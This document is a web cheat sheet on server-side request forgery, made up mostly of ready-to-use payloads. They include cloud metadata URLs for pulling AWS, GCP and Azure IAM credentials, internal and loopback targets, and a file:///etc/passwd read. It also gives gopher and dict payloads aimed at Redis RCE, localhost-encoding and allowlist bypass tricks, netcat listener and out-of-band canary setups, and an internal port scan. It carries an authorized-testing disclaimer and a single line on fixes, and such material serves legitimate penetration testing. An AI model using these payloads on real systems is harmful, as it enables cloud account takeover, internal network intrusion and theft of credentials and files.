CyberCheatsheets

SSRF (Server-Side Request Forgery) Cheat Sheet

Server-side request forgery payloads: cloud metadata access, internal port scanning, filter bypasses, and blind SSRF detection.

Web Application SecuritycloudinjectionowaspssrfwebUpdated 2026-06-17

Overview

SSRF tricks a server into making HTTP requests on your behalf, letting you reach internal services, cloud metadata endpoints, and localhost-only admin panels the firewall would otherwise block. Look for any feature that fetches a URL: webhooks, PDF/image generators, URL previews, import-from-URL, and SSO/OIDC callbacks.

Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.

Cloud metadata (highest impact)

AWS IMDSv1 metadata root

http://169.254.169.254/latest/meta-data/

AWS — list then read IAM role keys

http://169.254.169.254/latest/meta-data/iam/security-credentials/

GCP metadata (requires a header)

http://metadata.google.internal/computeMetadata/v1/  (header: Metadata-Flavor: Google)

Azure IMDS

http://169.254.169.254/metadata/instance?api-version=2021-02-01  (header: Metadata: true)

Internal targets

Loopback — reach localhost-only services

http://127.0.0.1:80/

Internal admin panel bound to localhost

http://localhost:8080/admin

Internal host (Redis, Elasticsearch, etc.)

http://10.0.0.5:6379/

Local file read if the fetcher honors file://

file:///etc/passwd

Interact with text protocols (Redis) via gopher/dict

dict://127.0.0.1:6379/INFO

Filter bypasses

Alternate localhost encodings (decimal/octal/short)

http://127.1/   http://0/   http://0177.0.0.1/

127.0.0.1 as a decimal integer

http://2130706433/

IPv6 loopback / IPv4-mapped

http://[::1]/  http://[0:0:0:0:0:ffff:127.0.0.1]/

DNS names that resolve to 127.0.0.1

http://localtest.me/  http://127.0.0.1.nip.io/

Userinfo trick to confuse allowlist parsers

http://attacker.com@169.254.169.254/

Encoded path tricks against allowlist regexes

http://169.254.169.254%2f%2e%2e%2f

Blind SSRF detection

Point the request at your collaborator/listener

http://10.10.14.5/ssrf-test

Use an OOB DNS/HTTP canary

http://<id>.oast.fun/   # Burp Collaborator / interactsh

Watch your listener for the inbound hit

nc -lvnp 80   # or: interactsh-client

Escalation: internal port scan

Probe internal ports via response timing/errors

http://127.0.0.1:22/   http://127.0.0.1:3306/   http://127.0.0.1:8000/

Gopher to send arbitrary bytes (e.g. unauth Redis RCE)

gopher://127.0.0.1:6379/_<url-encoded-redis-commands>

Tips

  • Cloud metadata is the money shot — IMDSv1 IAM creds turn SSRF into cloud account access.
  • If output isn't returned, treat it as blind SSRF and confirm with an OOB canary (interactsh/Collaborator).
  • gopher:// lets you craft raw TCP payloads — the path from SSRF to internal-service RCE.
  • Fix = allowlist destinations, block link-local/RFC1918 ranges, and enforce IMDSv2 — note all three.

References

Related cheat sheets